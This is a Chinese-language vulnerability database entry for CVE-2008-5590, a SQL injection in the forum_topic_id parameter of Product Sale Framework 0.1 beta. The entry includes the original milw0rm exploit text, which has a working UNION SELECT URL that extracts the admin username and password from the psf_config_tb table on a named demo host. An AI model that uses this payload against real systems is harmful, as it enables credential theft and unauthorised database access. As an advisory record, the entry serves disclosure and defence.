Kalptaru Infotech Product Sale Framework forum_topic_id 参数SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1116967 漏洞类型 SQL注入
发布时间 2008-12-07 更新时间 2009-03-18
CVE编号 CVE-2008-5590 CNNVD-ID CNNVD-200812-275
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/7368
https://cxsecurity.com/issue/WLB-2008120137
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200812-275
|漏洞详情
KalptaruInfotechProductSaleFramework是一个免费的自动处理数字产品销售的脚本。KalptaruInfotechProductSaleFramework0.1beta的customer.forumtopic.php中存在SQL注入漏洞。远程攻击者可以借助forum_topic_id参数,执行任意SQL指令。
|漏洞EXP
+++++++++++++++++++++++In The Name Of Allah+++++++++++++++++++++++++++
        +                                                                    +
        +         Product Sale Framework sql injection Vulnerability         +
        +                                                                    +
        +                      Discovered by b3hz4d                          +
        +                                                                    +
        +                      WwW.DeltaHacking.Net                          +
        +                                                                    +
        +                                                                    +
        +                                                                    +
        ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
                                  

                              APA Center of Yazd University   
                                 (https://www.ircert.cc)    

		
AUTHOR : b3hz4d (Seyed Behzad Shaghasemi)
DATE   : 06 Dec 2008
SITE   : WwW.DeltaHacking.Net
CONTACT: behzad_sh_66@yahoo.com

#####################################################

APPLICATION   : Product Sale Framework v0.1 beta
DOWNLOAD(free): http://www.productsaleframework.com/downloads/psf.zip
VENDOR        : http://www.productsaleframework.com
DEMO (links)  : http://www.productsaleframework.com

#####################################################


[+] vuln    : 
              customer.forumtopic.php
              
              vulnerability is in froum.all demo link(Admin demo,Affiliate demo,Customer demo) is here:
             
              http://www.productsaleframework.com/

[+] Exploit : 
              Admin Username and Password:

              http://www.kalptarudemos.com/demo/psf/customer/customer.forumtopic.php?forum_topic_id=-1 union select concat(username,0x3a,password),2,3,4,5,6 from psf_config_tb
    
               
##########################################################################################################

# Greetings: str0ke, Dr.Trojan, Cru3l.b0y, l0pht and all member in DeltaHacking.Net & Snoop-Security.Com #

##########################################################################################################

# milw0rm.com [2008-12-07]
|参考资料

来源:XF
名称:productsaleframework-custforumtopic-sql-inj(47144)
链接:http://xforce.iss.net/xforce/xfdb/47144
来源:BID
名称:32672
链接:http://www.securityfocus.com/bid/32672
来源:MILW0RM
名称:7368
链接:http://www.milw0rm.com/exploits/7368
来源:SREASON
名称:4743
链接:http://securityreason.com/securityalert/4743